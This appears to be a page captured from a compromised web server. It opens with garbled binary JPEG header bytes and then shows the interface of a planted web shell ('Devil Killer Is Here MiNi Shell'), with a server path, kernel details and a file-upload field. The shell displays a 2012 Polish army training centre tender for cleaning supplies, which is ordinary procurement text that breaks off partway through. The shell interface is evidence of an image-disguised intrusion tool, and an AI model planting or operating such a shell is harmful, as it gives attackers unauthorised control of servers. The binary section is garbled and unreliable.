JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120321/65681-N-2012.html

<p class="kh_header"><b>Poznań: Dostawę chemii profesjonalnej do utrzymania  czystości w bloku żywnościowym,  artykułów higienicznych i opakowań jednorazowych oraz sprzętu do utrzymania czystości</b><br>
<b>Numer ogłoszenia: 65681 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Szkolenia Wojsk Lądowych , ul. Wojska Polskiego 86/90, 60-628 Poznań, woj. wielkopolskie, tel. 061 8575245, faks 061 8575066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cswl.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja budżetowa - obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę chemii profesjonalnej do utrzymania  czystości w bloku żywnościowym,  artykułów higienicznych i opakowań jednorazowych oraz sprzętu do utrzymania czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa środków chemicznych do utrzymania higieny i czystości, artykułów higienicznych opakowań jednorazowych oraz sprzętu do utrzymania czystości                w ilościach i asortymencie wymienionym w załączniku nr 3 ( 3/1; 3/2; 3/3)  do SIWZ - formularzu cenowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.13.00-9, 39.83.20.00-3, 33.71.15.00-2, 39.22.10.00-7, 39.22.43.40-3, 39.22.43.00-1, 39.83.17.00-3, 39.22.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują  pojazdami, sprzętem spełniającym  wymogi ADR -                                  dotyczy zadania nr 2 w przypadku przewozów towarów objętych przepisami ADR,Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	dysponują osobami posiadającymi kwalifikacje i doświadczenie w tematyce przewożenia substancji, preparatów niebezpiecznych - dotyczy zadania nr 2                     w przypadku przewozów towarów objętych przepisami ADR,
c)	dysponują osobami posiadającymi uprawnienia do przeprowadzenia szkolenia   całości personelu służby żywnościowej z zakresu BHP w tematyce bezpiecznego użytkowania i posługiwania się dostarczonymi środkami oraz z zakresu GHP                   i GMP środków oferowanych prze Wykonawcę w zakresie utrzymania higieny w kuchni, stołówce i magazynie żywnościowym w ujęciu stosowania środków, uzyskania efektu mycia lub/i dezynfekcji i ich wpływu na konsumentów  - dotyczy zadania nr 2
Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia oraz wykazu osób złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">9)	Dokumenty potwierdzające spełnienie wymogów jakościowych i technicznych przez oferowane towary, określonych przez Zamawiającego w załączniku nr 4 ( 4/1; 4/2; 4/3)tj :
9.1) dla zadania nr 1: 
a)	nazwa: Szczotka do szorowania 
dokumenty wymagane, które należy dołączyć do oferty - potwierdzenie spełnienia parametrów wyparzania (odporność włosia na temperaturę).
b)	nazwa: Szczotka do szorowania ręcznego
dokumenty wymagane, które należy dołączyć do oferty - potwierdzenie spełnienia parametrów wyparzania (odporność włosia na temperaturę)
c)	dozowniki do płynów dezynfekcyjnych
dokumenty wymagane, które należy dołączyć do oferty - potwierdzenie zgodności z specyfikacją (folder, broszura itp.);

9.2) dla zadania nr 2:
a)	nazwa: Mydło w płynie do rąk.
       dokumenty wymagane, które należy dołączyć do oferty:
1)	wypis ze zgłoszenia do Krajowego Systemu Informowania o Kosmetykach wprowadzonych do obrotu,
2)	etykieta zaoferowanego produktu,
3)	świadectwo, wynik badania potwierdzający jakość zaoferowanego produktu                           i spełnienie wymagań fizyko-chemicznych potwierdzone lub wystawione przez organ uprawniony do kontroli jakości. 

b)	nazwa: Płyn do higienicznej dezynfekcji rąk.
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia                       i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

c)	nazwa: Płyn do ręcznego mycia naczyń op. Duże.
dokumenty wymagane, które należy dołączyć do oferty:
1)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
2)	etykieta zaoferowanego produktu,
3)	karta charakterystyki,
4)	wynik badania laboratoryjnego potwierdzającego wymagane stężenie procentowe substancji organicznej,


d)	nazwa: Płyn do ręcznego mycia naczyń.
dokumenty wymagane, które należy dołączyć do oferty jak w pozycji wyżej

e)	nazwa: Płyn do mechanicznego mycia naczyń.
dokumenty wymagane, które należy dołączyć do oferty:
1)	Dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
2)	Etykieta zaoferowanego produktu,
3)	Karta charakterystyki,
4)	Instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

f)	nazwa: Płyn do nabłyszczania w zmywarkach.
	dokumenty wymagane, które należy dołączyć do oferty:
1)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
2)	etykieta zaoferowanego produktu,
3)	karta charakterystyki,
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

g)	nazwa: Płyn do mycia i dezynfekcji podłóg i ścian
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia                      i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

h)	nazwa: Płyn do mycia i dezynfekcji sprzętu i wyposażenia
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

i)	nazwa: Kwaśny płyn do mycia i dezynfekcji. 
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym;
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji- przedstawiona zgodnie z wzorem oświadczenia.

j)	nazwa: Kwaśny preparat do dezynfekcji.
	dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

k)	nazwa: Płyn dezynfekcyjny do kratek ściekowych
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym;
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

l)	nazwa: Płyn do usuwania osadów mineralnych
dokumenty wymagane, które należy dołączyć do oferty:
1)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).,
2)	etykieta zaoferowanego produktu,
3)	karta charakterystyki;
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.

m)	nazwa: Płyn do sanitariatów antybakteryjny
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	pozwolenie Ministra Zdrowia na obrót preparatem biobójczym,

ł)  nazwa: Płyn do usuwania przypaleń ze spryskiwaczem
 dokumenty wymagane, które należy dołączyć do oferty:
1)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).,
2)	etykieta zaoferowanego produktu,
3)	karta charakterystyki;
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji- przedstawiona zgodnie z wzorem oświadczenia.

n)	nazwa: Płyn do usuwania przykrych zapachów ze spryskiwaczem
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki, 

o)	nazwa: Płyn konserwacji stali nierdzewnej - spryskiwacz.
dokumenty wymagane, które należy dołączyć do oferty:
1)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).,
2)	etykieta zaoferowanego produktu,
3)	karta charakterystyki,
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji- przedstawiona zgodnie z wzorem oświadczenia.

p)	nazwa: Proszek do szorowania
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia

q)	nazwa: Mleczko do czyszczenia.
dokumenty wymagane, które należy dołączyć do oferty:
1)	etykieta zaoferowanego produktu,
2)	karta charakterystyki,
3)	dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument),
4)	instrukcja sposobu użycia gwarantująca skuteczność wykonania zabiegów mycia i (lub) dezynfekcji - przedstawiona zgodnie z wzorem oświadczenia.
 
9.3) zadanie nr 3 
a)	nazwa: Woreczki foliowe HDPE 14/4/32.
dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem do kontaktu z żywnością lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie                              z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

b)	nazwa: Reklamówka 25x6x45cm popularna
dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem do kontaktu z żywnością lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie                                z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

c)	nazwa: Folia aluminiowa do żywności szer. 28 cm.;
dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem do kontaktu z żywnością lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie                                 z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.
d)	 nazwa: Papier pakowy półpergamin.
dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument) albo udokumentowanie oznaczenia produktu określeniem do kontaktu z żywnością lub odpowiednim symbolem w formie folderu, katalogu, etykiety, zdjęcia, części opakowania produktu zgodnie                               z rozporządzeniem 1935/2004 Parlamentu Europejskiego i Rady.

e)	nazwa: Ręczniki papierowe w roli. 
 dokumenty wymagane, które należy dołączyć do oferty:
1) etykieta zaoferowanego produktu,
2) świadectwo jakości produktu,

f) nazwa: Druciak metalowy 30gr.
dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).

g)	nazwa: Zmywaki z gąbką do naczyń.
     dokumenty wymagane, które należy dołączyć do oferty - dokument potwierdzający przeznaczenie produktu (ocena, opinia, atest, świadectwo jakości zdrowotnej PZH lub inny równoważny dokument).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty, stanowiący załącznik nr 1 SIWZ,
formularz cenowy, stanowiący załącznik nr 3 do SIWZ

	dokument/ty potwierdzające uprawnienie do podpisania oferty                                      ( w przypadku kserokopii potwierdzone za zgodność z oryginałem przez Wykonawcę )  lub pełnomocnictwa jeżeli  uprawnienia do podpisania oferty nie wynikają z załączonych dokumentów ( w przypadku kserokopii potwierdzone za zgodność z oryginałem notarialnie )</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Zamawiający dopuszcza możliwość zwiększenia ilości towarów będących przedmiotem zamówienia (umowy) w przypadku zwiększenia się zapotrzebowania na przedmiot zamówienia, który jest niezbędny dla prawidłowego funkcjonowania Zamawiającego, 
 w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu:

a)	zadanie I - Dostawa  sprzętu do utrzymania czystości- netto do 40 000,00 zł
b)	zadanie II - Dostawa chemii profesjonalnej do utrzymania higieny i czystości w bloku żywnościowym- netto do 52 000,00 zł 
c)	zadanie III -  Dostawa artykułów higienicznych i opakowań jednorazowych- netto do 33 000,00 zł
d)	Wykonawca dostarczać będzie zamówiony dodatkowy asortyment w ciągu 7 dni roboczych od dnia  złożenia zapotrzebowania przez Zamawiającego, transportem na własny koszt.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Szkolenia Wojsk Lądowych , Poznań , ul Wojska Polskiego 86/90 u p. Małgorzaty Spychalskiej tel 61 857 52 45.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 10:00, miejsce: Centrum Szkolenia Wojsk Lądowych , ul. Wojska Polskiego 86/90 , 60-628 Poznań, kancelaria jawna , bud nr 18 pokój nr 3 od pon-pt w godz. od 7.30-11.00 oraz od 13.30-15.15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  sprzętu do utrzymania czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa  sprzętu do utrzymania czystości: Szczotka zamiatacz z kijem
Stelaż do Mopa
Mop supełkowy płaski do stelarza 40 cm
Ściągaczki do wody 
Trzonek alumioniowy do stelaża MOP-a
Szczotka do szorowania
Szczotka do szorowania ręcznego 
Trzonek alumioniowy do stelaża szczotki do szrowania
Trzonek alumioniowy do sciągaczki
Kosz na śmieci 120 l
Listwa z zawieszkami 5 szt.
Dozowniki do płynów dezynfekcyjnych
Dozowniki do mydła w płynie
Szufelka na śmieci metalowa
Kosz na odpady 15l
Pojemnik na ręczniki papierowe w rolach 
Wózek MOP - komplet.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.10.00-7, 39.22.43.40-3, 39.22.43.00-1, 39.83.17.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa chemii profesjonalnej do utrzymania higieny i czystości w bloku żywnościowym.</p>
